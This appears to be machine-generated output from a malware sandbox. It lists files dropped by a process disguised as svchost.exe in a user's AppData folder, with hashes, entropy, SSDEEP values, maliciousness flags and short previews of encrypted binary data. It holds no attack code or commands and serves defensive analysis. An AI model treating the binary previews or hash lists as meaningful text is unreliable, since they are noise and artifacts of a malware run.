                                                          SHA1:F4B3A1221BB287B70CC60463FE9F0CA382C5D635
                                                          SHA-256:8A61CBC399583F18D24E8AFFE2F7ADE83EEAC46963BB4CE66369148E413B7B42
                                                          SHA-512:352E2CD398FE7C6A3CFD41D3691CAC25EA057A8CA1F1DB2276D78145F8B1E0181C8F2DBF1981437E4CA13168A6000A4FFBCAB3D8BCACC43C13C4F8CB37E067E8
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1728
                                                          Entropy (8bit):7.808249336815543
                                                          Encrypted:false
                                                          SSDEEP:24:2Of5BxLhGi39dftcLcLjBgWfCzu8JTttoMc4Vs/jz4Curwhf2w0oZ7+WhmgXAMVS:Lf+9LcPN6zuYhqMcwdrOf2W7+uwP
                                                          MD5:686FAF80B5ABFC3340EC2ED376B7BBFF
                                                          SHA1:D8FDA59F8E082B504AF293FC8A9BB5B379F81D1A
                                                          SHA-256:D1D8810878DBE4CB6AE6B3DC9A4C92F4A7EC7870FF1476FB8DFCB83798A98CE2
                                                          SHA-512:B088B1BF362AA42FFC69EBE68663DCD19353E6FE5C4E575D85856F25E071E523BE2CA06FE845503A0F006318923CE53F99BAC6D6F977E4D7BBE1F60DC5C40966
                                                          Malicious:false
                                                          Preview:........Mg.W,......=N....#.0lS6..i..<......3ydwG{.O....O.3...........U.{9..E%.u...DD.%..+...q.>......1{..@O.?..~;......... .l.*M...2!(..M.@.!$pUzb-`...)%B.V.i.|..,..w......z....O......*g......0....+.`F..d....[8..v.Dy).x_..JU.I..ou.^R..F..d/0.....s..Z..'.a.........<.@...+"lD3...Z.c3l.D.~...G..8..Qo6.....).8.C.t.-..jA}Q._._]...to.:%.o..&../...x..+../f.W.G,.~RC..[..#.s..y+=qC@.....G../Y..s....<V.Y{...a..!..,WJO..&...iZX.sA....^.p..2r................3.h.H].;....tny._..J.^DweIJV.g..0!*...rI.aTRe.P....G...R.../w........i~...$i.........9M...y6./..Og(.n.tF.._n....1P.......sC.HuV7..g....P...s..yB.Y/\.J&r.s..".F=5....'.v..:&aCI...Ao......Y.x.. .".....$..3T"DD.v..?.Bo...F..%...d2.i..8s80...v..jO.b..N.%...<v..d$..?.%.<....x..y.\..{..Ic.m.*V..[b.......XC8../.x..>.T.......M....~t].....ca............$...x_.Z.CT...4.(=...g.G.f...j..s.....".Tx......Om.y@/...@.p....<.@..8.u.#\P...r^.r.z...p...A6E....../.vyI.jH..."..,ET...7&!..+.&.K..............y$.2..d,w.t.pm.X#.d
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1760
                                                          Entropy (8bit):7.815196517289248
                                                          Encrypted:false
                                                          SSDEEP:48:OJPcd8G0CaQju0+0qFrg2SvwxM/4LcI2y3URBkX3:MU/G0A0Ig5vwq/ecIMBe3
                                                          MD5:848874F622DFE767822E628B63ECFBDD
                                                          SHA1:AB86A6B9A1BF446755CC6F8D868FAD91E3F97BA1
                                                          SHA-256:01886E407B27025D113775DAA7CE7C234C5F37E4236939515716179D5F83C227
                                                          SHA-512:E1865A215DADEA5119855A2290BFBE59F6EEDD6935B8958342B053155D7395BEE9F1D92468E4829F59B5B083F68740C4E3413E8738B0167FB828118015E130D2
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1760
                                                          Entropy (8bit):7.832482504120233
                                                          Encrypted:false
                                                          SSDEEP:48:TYqB+xvmOZqJS+Vwu6y+G7Cf/K1jBjXDLkFgc:DIFgc+Vwu6zG+K1jBwqc
                                                          MD5:69F370D04D77D356E2776248934EDFED
                                                          SHA1:CFB6B00BDF93D2AED3F060DDF4754A78A30AB619
                                                          SHA-256:AB42F80CF0B65CBCD2299BE126DAFA3A18349E07BFDE4A120F3F87D1A6A767CC
                                                          SHA-512:490DC76D642E1A14512CA10EFF9AD04A818C3B00190CCF433B55F3724F46701FF72F9FE44301FC37A0D69E5DC77E7AF59C1CA4369B6A86C41FCB0AA6D6291828
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1728
                                                          Entropy (8bit):7.825761368945233
                                                          Encrypted:false
                                                          SSDEEP:24:11G+osfb3acRy6clMIioqnOe4E+Z+f1CCQ77/4m95jHZjZg1PelEtVgzv:zZ+cRGqoRe4E+KlQI45jrorVgzv
                                                          MD5:451E48DC932B8699610071FA815D7C31
                                                          SHA1:A59EC7EFE4365F5C1DB2C760473F910DD3C905BC
                                                          SHA-256:A4931DE382F7441CF42D9104D8955135348FDD8700C0B152B210A53F499DCEE8
                                                          SHA-512:C8C8F45EC24AC371183D8118515C84948063A016DDDB51483C707899D1A356205473F234B354116ED3BF8761FDC6693911A12E01FD447A1D3BAF1AC0FCD25A6F
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1760
                                                          Entropy (8bit):7.822192196509547
                                                          Encrypted:false
                                                          SSDEEP:48:wZDXAaetmTNyrIf3SNpChrBGGQ7CigOU/9edpkrWiwJ:uzA9tmIrXNpOlGl7TgOc9erkbQ
                                                          MD5:B7BDAC4C22218ABFD043485592628211
                                                          SHA1:92183B5EF361468CF6765723A448797FFA64F3D8
                                                          SHA-256:633D2218775A4E852F7D70FE30F70B321212F55D7D0BB60F9DCFAC241F85B61F
                                                          SHA-512:06ABAFE82894F1860AEB4A29D115FE6C54A426E0AC5B5299C9931887EB8CE75DA33A26DE43D8DA2F9AF0171AD7558711A5468A84AEB3AA4F22F15ABE29091F14
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1728
                                                          Entropy (8bit):7.80271647465796
                                                          Encrypted:false
                                                          SSDEEP:24:yMhXFdkneXJfrDy4Nvxb21js+jocbPNW8TkQYuuv2s7OkH89Ald1mTzYr:yMHdkne1rDP9itZM8tacald8Ir
                                                          MD5:79A8D8DA1A0AB9C86A9CAE97683F0D9A
                                                          SHA1:9C24B1C8830612C07429962211FBA13C832DC181
                                                          SHA-256:A962AC7D011B730972B311FF38127DE35C1CD7DF9AF7BA8ED934AFB4F5FBCA87
                                                          SHA-512:20117013378141D37AADA30A82D794707C34CD19083B2FC58CA0A5FD45B50107482653F94C2FAD078E1CBE1FE68BC5320F2DE01C4F72AF62271BA698C90A3998
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1728
                                                          Entropy (8bit):7.8155020523339465
                                                          Encrypted:false
                                                          SSDEEP:48:FAGf4FqZZKAPME6HgdBkeLCPgzH6bIUZuMMfEimMcFlrTFf+:qGEAKy6k1CPbIUZuDml+
                                                          MD5:0F566B996738CEFDCC48F2A5F396AD06
                                                          SHA1:60B46B81AF48D06000388EB6B43C13EE27069914
                                                          SHA-256:3E994E344E89B6CBCAD06EC10B4388C6CB9CB1D7CD22FE02261756F04F22C6FF
                                                          SHA-512:1F449DF45B735DBB388732817A82E229BA0C6AD1083C0D7476D3AAAD66971317EFF5523107800361F5E16023F4322E09A00E351FA201553755940BFA3FB6BCBF
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1728
                                                          Entropy (8bit):7.811400395245901
                                                          Encrypted:false
                                                          SSDEEP:24:QmV4cLtnswe4q08FkueqQPwpnT11XZ1AUPLpadeGH3l4yMAI18JVXMKYct2rApnf:Qmxnp38fRnTEYYn3l43sact2655
                                                          MD5:41E0CB722F2B7A2E4BD088AD34912BD0
                                                          SHA1:C8E7CB7CDA13E04972DED38E49ADB4C207C2A821
                                                          SHA-256:1A3952ACA9BA3F711F0CC607D6F7735587A895E216EEFF551D8E22DC86D979D4
                                                          SHA-512:8403357FEA1E333DD780497D0FE901D4D29978EC998BAD3F6BA2C1F0201AA47B725D728E71A919B1922338C436BDC72750D48EB55CF622C0591C7277A579B5D0
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1760
                                                          Entropy (8bit):7.819172313675376
                                                          Encrypted:false
                                                          SSDEEP:48:Vm9mtJNMfhcnRXJRhmzaKM9KwB0rtfclujuNH:E9c7Rzhd8FrQ8uNH
                                                          MD5:3C200C7F36A036D91C2D7B0A1CBE87F0
                                                          SHA1:D13C30E17A84855459D83DD46F3D7DBDB75326C6
                                                          SHA-256:40A3F34BD7C1085B582CEA2612C65592A66267B168116D0C83D0B90848BFBAFF
                                                          SHA-512:3D0AB44367DE5F14F0BD08B7F4A712D345ECDC91F773B0A87D3661C7344834B2ECF4A3B9DC32865D3EAFD2ECFFBDC19D86D71CDFC32C34622189F569B6E31499
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1744
                                                          Entropy (8bit):7.822071431789293
                                                          Encrypted:false
                                                          SSDEEP:48:rEoocAHcgU7SrinHN6QY6//56Nu1G6IUqaSp7rL:rEoGHcqI6k//5Jpfk7P
                                                          MD5:C6160DC22E27991B01A9FC9555E1CE22
                                                          SHA1:E399445FE2CFD4EFFD5DD9085E9BA12C8C314849
                                                          SHA-256:74B0F71BB18EB47AF1B4BCA1F75F3A2963208C95D41DEE79AB89F6A942A15D8A
                                                          SHA-512:56BC3ED0162AC876176B4A4908AB166E22A554F6404B0C2229A8FBF16E873A92AB75A6CE75452FB9A5FFED1CDB3A985CA34055AF0C467743193C9C005D457F9B
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1776
                                                          Entropy (8bit):7.814200137227033
                                                          Encrypted:false
                                                          SSDEEP:24:ydNNBlLq0ghQsHc8893u47jjKMek8KOn9pcZ6Hx9aNFgPtit12XOyYU1FyyiI9qj:ydPaysHnfAvo1KE7a+yNaPcnwOgR0V
                                                          MD5:F6400F33C334938CFB2A0059CF481D4B
                                                          SHA1:7614B0BD477548257C4623C476AE1EFEB195BE63
                                                          SHA-256:2B81069D3AFE083CAB85826A44584ECCD716286722B91B71F514407C5C1FCBD9
                                                          SHA-512:76A177E6D4AD900DD46F73FF79A6A58DB1E4364AED636A96881C9D7F866E9D887481DA6B553CC40432E5BF93D7FE5C163B6E7CB8381CE3D1EDB607C6811D00E1
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1760
                                                          Entropy (8bit):7.822667167279572
                                                          Encrypted:false
                                                          SSDEEP:48:CjxfqeUTnz/cXRdKrh+SNtrO+4ap7KoVTmY1TEmjY:sKzEX4hfHO+dRVaY1s
                                                          MD5:4B4E6AE7EA7D68EDF9E56DA963AE3179
                                                          SHA1:79471C6F567CD9FA5C274F1169F2E42DB7AB501E
                                                          SHA-256:174BE597FBEA9E6BBDD182310BB135D735E2F2F1ADC90D32FF217FD17E2F73B7
                                                          SHA-512:B1DA9201460652E71B4F3685255A7FC24FB32BB684A815088FE5CCA950AFA39671F092312BB293EA2DAC258AA780321F05F52D36560E1B416236C75707F2BE51
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1120
                                                          Entropy (8bit):7.6500379449994975
                                                          Encrypted:false
                                                          SSDEEP:24:BH0/IYpJe7wl4EFJ4+4keFXnAfoFt0fiXFu1kuvWSDY7k8zPCJY:BdQw09J4e+nNuiI1FvWS87khW
                                                          MD5:91DE70EFBA29B288BBB9CF58E64A8DB5
                                                          SHA1:28337316943CA3EF7AD76A7EB50C74F06BA708B3
                                                          SHA-256:9934E4B7BB8828723D25A50224CB2E28806A7CFF8F1ED0F86A45CD6A67BBA0FE
                                                          SHA-512:6F90A607E91B67E0A3A713B6C08F51E14631E401093D0E63281A64E22C464C223F98D4A1E918D50553F8EA27D5FF24E06D20FDD0F8B310E7B4574918C0D0E021
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):24944
                                                          Entropy (8bit):7.992651579542604
                                                          Encrypted:true
                                                          SSDEEP:768:KScEkZokmM/qQXg7bJ39QyOE14UKj7u7LIPY2:mpDrSmg7N39QeU7u4A2
                                                          MD5:11589AA10B436CBFFA21A50C5B765244
                                                          SHA1:CCBCF870F1D0B280DB9475FCA1E1701EACECC427
                                                          SHA-256:5EB4ADB1F53EF77436C1F6D550C0E85A6393B249730C2161B3B2A2AEEC39FB2A
                                                          SHA-512:131BE74074C0F98D9D176AC0ED0B7C57C97780591F0E5044960189F97BAE1749E761A4B429EC25D33707FEDB638775649A215D08883B23FE1243745EEFBA9737
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):24944
                                                          Entropy (8bit):7.993233697374732
                                                          Encrypted:true
                                                          SSDEEP:384:9VUsR0AKP7rLopgBh3yWE/R0YK4nHKoeVyhkL3nocA7NcUCOK6Jt9HmorO7L+v:4sGtEpKCWsD1nHfeBYcSZJOoqGv
                                                          MD5:037C067B06F73906B0CF5603FB85A65C
                                                          SHA1:1C67DC303A9F4B612CC2894E9150A80B35AEEEFE
                                                          SHA-256:873532EA252DA6A482D07615DBA64A4FCE1DECFC760F5489E9E052489B1499F0
                                                          SHA-512:B81F2263E4A16AB9251E8DA12A61E523F7306D3AEE0690027A41CF0676C90BE7006373A87ECD6249C18C38E0D3591E50B8C560E93D351B70E35918C107C8C7EF
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):24944
                                                          Entropy (8bit):7.99119841684219
                                                          Encrypted:true
                                                          SSDEEP:384:+KdWrg4yEIhPAnTi/nuUkYbJqAkeRWfU4iNU1OJdkP6hbJEj8rh3Zh63hRJOsrFg:r4yDhITc5k6liUZUsWCliozh63hFkfJ
                                                          MD5:0AD39D6938081E71BCED863610428C04
                                                          SHA1:C7B157016B9233928A397F12792BBB43098AD389
                                                          SHA-256:4F20B69CD6864940378448E23AD6EEE37AB083067F88FCB3A1D5843FB04C47C6
                                                          SHA-512:EC5A8207EFBB7CC3C4EBA86A5C36A7AB2B07EC4CB50DCA9A8E73A2335359E757AFAD201F0619FF652A27FEC89205C1B26F7A563A44A7AEA82E21622D4FA95FDE
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):24944
                                                          Entropy (8bit):7.991738103166166
                                                          Encrypted:true
                                                          SSDEEP:768:6YBk4BC4zioKc20oxjPqUOXPoupVBXmTvP:6YB7o9swuxmTvP
                                                          MD5:CF5502531093A9E5B3AD1FD815EFD7B0
                                                          SHA1:9A6C710CD7CEF20A142697B4E207B3064E0A720B
                                                          SHA-256:7F513C2D18F5BFC6C3F5EAF8A61A801330249AA79942DC322B31106185484C5A
                                                          SHA-512:02F0A2A7FD8230F5E3DFB683AA353902624E218539882B715376EEEC271265C4C48C4DA0CB52B2B467EBA65F5250157DAEF3D75EFB25CFCCEFB404691D22D08E
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1376
                                                          Entropy (8bit):7.75991444398015
                                                          Encrypted:false
                                                          SSDEEP:24:4xrkxoKe6QuoFmWi9WnAF4/0tA6iKb/DLbFm6jXy9CBXDptaswdjQaYS5alufvmn:a8oKW9I9sAM6PnO9sXydsDSwr
                                                          MD5:15BC9F4F765C06C70B162B60E8CDD45D
                                                          SHA1:67DD6D0232913E21EF47B8DDBF8028BD99D29466
                                                          SHA-256:66C05A471B3A8C7289151C6470E11AB15143668523291FEA7F756708901415B9
                                                          SHA-512:59057C8FB3D41E5911E985C14406C217FB678871CD5612BD469F0CA5A2048D01423A657511BECA9CFCF2888C076FBAAE4D9852F9F3D860DF5C1AAECB7AE1D8DA
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):368
                                                          Entropy (8bit):6.063506008230466
                                                          Encrypted:false
                                                          SSDEEP:6:qoDS7l+G+HKj1YKcnKpLeGTQSKz6WbuUkUNJ/IqT8hLWdifvUF:qeS7AG+HKhY7nKpaE2z7uUkUbIqgiifU
                                                          MD5:2BDC5B56A728BA6705A99471AB6BA7F4
                                                          SHA1:52713B260EB012860A84ED9863B291A513000C6A
                                                          SHA-256:23AEEF3B288AA09DDBE524596261F50D3EFBEB04A51553618F7A67D124DDEEE9
                                                          SHA-512:A8E59D49CA5A7455AB344158BF5B331105DC8940472016F3739E2EB3FD387704C8FD0183078AFAB65B5EDD2D1F15FE9624DC8E978431EEE77DBA2B2A6BADDCB1
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):424176
                                                          Entropy (8bit):7.999536768625056
                                                          Encrypted:true
                                                          SSDEEP:6144:68yMeoINu7rNLjtiOj/klD7z7tUGTlLA/Qntx1h3wkiDl4BsRbR3QduOa:8yYO7kZf7CGq+zEl4eh5Oa
                                                          MD5:31F31FE7C90C90712D4408285C550470
                                                          SHA1:19C896C8249EB4FDB3E8DFD8452FE7FA75B4E7D1
                                                          SHA-256:239279E10B455DA7B4DE98C16E84400B4340178ACE7F122E414E8374BC41514F
                                                          SHA-512:94887F84C0C9AE01FA4C62EA273D56B87FB7D20065158960CA2904A01AD3917E9D90AD4C987AD644DF652E375E23E132FE538672CC0422F59CCD65B871A09265
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):368
                                                          Entropy (8bit):6.082425927310368
                                                          Encrypted:false
                                                          SSDEEP:6:G+TVHvzFZMpUriczpenlasCMOf4jg9xA1yWLX1fDzLaJmA8n5+:7KUE6Pfig9oLlfDaJJU5+
                                                          MD5:D3174006FBA480A7574A08D5917299F8
                                                          SHA1:0643966F2016970D606B187F2E088C6BEAFDC467
                                                          SHA-256:A0D704CD3925B82D884CA9A76B02EAC72C12D276FA846CAAEA65D837405A21CF
                                                          SHA-512:6253FC67FC40D5E4B5E7E5A03C416500011500C329370C7EAF0D1F73C700CEDB97D146EC19D5953670F314555EA4F1516589632C9A780DFAA7CB32C62F63B921
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):368
                                                          Entropy (8bit):6.072182900917685
                                                          Encrypted:false
                                                          SSDEEP:6:KjnwR1DZnhPDC4vysbcvAa7STeO+xI23AB11aS9vjM/gh5VbnalIH5Wy4IZUnLYY:KjKdZ5xy1HGTKwByOwofVaqW2UL1
                                                          MD5:F45C355B5BB0FDD45CA55BF973D22CD4
